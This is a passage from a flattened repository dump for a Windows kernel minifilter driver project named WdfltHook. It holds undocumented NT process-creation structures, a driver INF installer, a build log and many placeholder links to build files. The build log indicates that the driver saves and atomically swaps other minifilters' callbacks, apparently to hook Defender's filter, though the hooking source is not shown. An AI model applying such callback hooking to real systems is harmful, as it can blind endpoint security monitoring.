THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010 // ? 321 | #define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020 // ? 322 | #define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080 323 | // end_rev 324 | 325 | // windows-internals-book:"Chapter 5" 326 | typedef enum _PS_CREATE_STATE { 327 | PsCreateInitialState, 328 | PsCreateFailOnFileOpen, 329 | PsCreateFailOnSectionCreate, 330 | PsCreateFailExeFormat, 331 | PsCreateFailMachineMismatch, 332 | PsCreateFailExeName, // Debugger specified 333 | PsCreateSuccess, 334 | PsCreateMaximumStates 335 | } PS_CREATE_STATE; 336 | 337 | typedef struct _PS_CREATE_INFO { 338 | SIZE_T Size; 339 | PS_CREATE_STATE State; 340 | union { 341 | // PsCreateInitialState 342 | struct { 343 | union { 344 | ULONG InitFlags; 345 | struct { 346 | UCHAR WriteOutputOnExit : 1; 347 | UCHAR DetectManifest : 1; 348 | UCHAR IFEOSkipDebugger : 1; 349 | UCHAR IFEODoNotPropagateKeyState : 1; 350 | UCHAR SpareBits1 : 4; 351 | UCHAR SpareBits2 : 8; 352 | USHORT ProhibitedImageCharacteristics : 16; 353 | }; 354 | }; 355 | ACCESS_MASK AdditionalFileAccess; 356 | } InitState; 357 | 358 | // PsCreateFailOnSectionCreate 359 | struct { 360 | HANDLE FileHandle; 361 | } FailSection; 362 | 363 | // PsCreateFailExeFormat 364 | struct { 365 | USHORT DllCharacteristics; 366 | } ExeFormat; 367 | 368 | // PsCreateFailExeName 369 | struct { 370 | HANDLE IFEOKey; 371 | } ExeName; 372 | 373 | // PsCreateSuccess 374 | struct { 375 | union { 376 | ULONG OutputFlags; 377 | struct { 378 | UCHAR ProtectedProcess : 1; 379 | UCHAR AddressSpaceOverride : 1; 380 | UCHAR DevOverrideEnabled : 1; // from Image File Execution Options 381 | UCHAR ManifestDetected : 1; 382 | UCHAR ProtectedProcessLight : 1; 383 | UCHAR SpareBits1 : 3; 384 | UCHAR SpareBits2 : 8; 385 | USHORT SpareBits3 : 16; 386 | }; 387 | }; 388 | HANDLE FileHandle; 389 | HANDLE SectionHandle; 390 | ULONGLONG UserProcessParametersNative; 391 | ULONG UserProcessParametersWow64; 392 | ULONG CurrentParameterFlags; 393 | ULONGLONG PebAddressNative; 394 | ULONG PebAddressWow64; 395 | ULONGLONG ManifestAddress; 396 | ULONG ManifestSize; 397 | } SuccessState; 398 | }; 399 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 400 | 401 | // begin_rev 402 | #define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff 403 | #define PS_ATTRIBUTE_THREAD 0x00010000 // can be used with threads 404 | #define PS_ATTRIBUTE_INPUT 0x00020000 // input only 405 | #define PS_ATTRIBUTE_ADDITIVE 0x00040000 /// Is an additional option (see ProcThreadAttributeValue in WinBase.h) 406 | // end_rev 407 | 408 | typedef enum _PS_ATTRIBUTE_NUM { 409 | PsAttributeParentProcess, // in HANDLE 410 | PsAttributeDebugPort, // in HANDLE 411 | PsAttributeToken, // in HANDLE 412 | PsAttributeClientId, // out PCLIENT_ID 413 | PsAttributeTebAddress, // out PTEB 414 | PsAttributeImageName, // in PWSTR 415 | PsAttributeImageInfo, // out PSECTION_IMAGE_INFORMATION 416 | PsAttributeMemoryReserve, // in PPS_MEMORY_RESERVE 417 | PsAttributePriorityClass, // in UCHAR 418 | PsAttributeErrorMode, // in ULONG 419 | PsAttributeStdHandleInfo, // 10, in PPS_STD_HANDLE_INFO 420 | PsAttributeHandleList, // in PHANDLE 421 | PsAttributeGroupAffinity, // in PGROUP_AFFINITY 422 | PsAttributePreferredNode, // in PUSHORT 423 | PsAttributeIdealProcessor, // in PPROCESSOR_NUMBER 424 | PsAttributeUmsThread, // see UpdateProceThreadAttributeList in msdn (CreateProcessA/W...) in PUMS_CREATE_THREAD_ATTRIBUTES 425 | PsAttributeMitigationOptions, // in UCHAR 426 | PsAttributeProtectionLevel, 427 | PsAttributeSecureProcess, // since THRESHOLD (Virtual Secure Mode, Device Guard) 428 | PsAttributeJobList, 429 | PsAttributeMax 430 | } PS_ATTRIBUTE_NUM; 431 | 432 | #define PsAttributeValue(Number, Thread, Input, Additive) \ 433 | (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \ 434 | ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \ 435 | ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \ 436 | ((Additive) ? PS_ATTRIBUTE_ADDITIVE : 0)) 437 | 438 | typedef struct _PS_ATTRIBUTE { 439 | ULONGLONG Attribute; /// PROC_THREAD_ATTRIBUTE_XXX | PROC_THREAD_ATTRIBUTE_XXX modifiers, see ProcThreadAttributeValue macro and Windows Internals 6 (372) 440 | SIZE_T Size; /// Size of Value or *ValuePtr 441 | union { 442 | ULONG_PTR Value; /// Reserve 8 bytes for data (such as a Handle or a data pointer) 443 | PVOID ValuePtr; /// data pointer 444 | }; 445 | PSIZE_T ReturnLength; /// Either 0 or specifies size of data returned to caller via "ValuePtr" 446 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE; 447 | 448 | typedef struct _PS_ATTRIBUTE_LIST { 449 | SIZE_T TotalLength; /// sizeof(PS_ATTRIBUTE_LIST) 450 | PS_ATTRIBUTE Attributes[2]; /// Depends on how many attribute entries should be supplied to NtCreateUserProcess 451 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; 452 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/restore_list.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | typedef struct _RESTORE_NODE 5 | { 6 | PVOID AddrOfCallback; 7 | LONG64 Callback; 8 | struct _RESTORE_NODE* Next; 9 | 10 | }RESTORE_NODE, *PRESTORE_NODE; 11 | 12 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = "Template" 13 | DriverVer = 10/31/2023,22.16.51.732 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.log: -------------------------------------------------------------------------------- 1 |  Building 'WdfltHook' with toolset 'WindowsKernelModeDriver10.0' and the 'Desktop' target platform. 2 | Stamping x64\Release\WdfltHook.inf 3 | Stamping [Version] section with DriverVer=10/31/2023,22.16.51.732 4 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf : warning 1420: [DefaultInstall]-based INF cannot be processed as Primitive. 5 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf(25-25): warning 1421: Section [DefaultInstall] should have an architecture decoration. 6 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf(36-36): warning 1421: Section [DefaultUninstall] should have an architecture decoration. 7 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf(74-74): warning 1205: Section [MiniFilter.DriverFiles] referenced from DelFiles and CopyFiles directive. 8 | WdfltHook.c 9 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(270,1): warning C4005: 'OBJ_VALID_ATTRIBUTES': macro redefinition 10 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\ntdef.h(1785): message : see previous definition of 'OBJ_VALID_ATTRIBUTES' 11 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(353,6): warning C4201: nonstandard extension used: nameless struct/union 12 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(354,5): warning C4201: nonstandard extension used: nameless struct/union 13 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(386,6): warning C4201: nonstandard extension used: nameless struct/union 14 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(387,5): warning C4201: nonstandard extension used: nameless struct/union 15 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(398,3): warning C4201: nonstandard extension used: nameless struct/union 16 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(444,3): warning C4201: nonstandard extension used: nameless struct/union 17 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(340,10): warning C4189: 'output': local variable is initialized but not referenced 18 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(335,11): warning C4189: 'LocalIntBase': local variable is initialized but not referenced 19 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(442,120): warning C4047: 'function': 'LONG64' differs in levels of indirection from 'PVOID' 20 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(442,106): warning C4024: 'SaveOrigCallback': different types for formal and actual parameter 2 21 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,96): warning C4047: 'function': 'volatile __int64 *' differs in levels of indirection from 'PVOID *' 22 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,68): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 1 23 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,119): warning C4047: 'function': '__int64' differs in levels of indirection from 'FLT_PREOP_CALLBACK_STATUS (__cdecl *)(PFLT_CALLBACK_DATA,PCFLT_RELATED_OBJECTS,PVOID *)' 24 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,98): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 2 25 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(447,122): warning C4047: 'function': 'LONG64' differs in levels of indirection from 'PVOID' 26 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(447,107): warning C4024: 'SaveOrigCallback': different types for formal and actual parameter 2 27 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,97): warning C4047: 'function': 'volatile __int64 *' differs in levels of indirection from 'PVOID *' 28 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,68): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 1 29 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,121): warning C4047: 'function': '__int64' differs in levels of indirection from 'FLT_POSTOP_CALLBACK_STATUS (__cdecl *)(PFLT_CALLBACK_DATA,PCFLT_RELATED_OBJECTS,PVOID,FLT_POST_OPERATION_FLAGS)' 30 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,99): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 2 31 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(414,40): warning C4189: 'TargetCallbackNode': local variable is initialized but not referenced 32 | WdfltHook.vcxproj -> C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook.sys 33 | Done Adding Additional Store 34 | Successfully signed: C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook.sys 35 | 36 | ......................... 37 | Signability test complete. 38 | 39 | Errors: 40 | None 41 | 42 | Warnings: 43 | None 44 | 45 | Catalog generation complete. 46 | C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook\wdflthook.cat 47 | Done Adding Additional Store 48 | Successfully signed: C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook\wdflthook.cat 49 | 50 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.obj -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.res -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.sys.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook.sys 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/Inf2Cat.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/Inf2Cat.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/WdfltHook.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\dorge\source\repos\WdfltHook\| 3 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4016.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4332.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.4344.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5868.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.5884.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.6024.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.7112.read.1.tlog: -------------------------------------------------------------------------------- 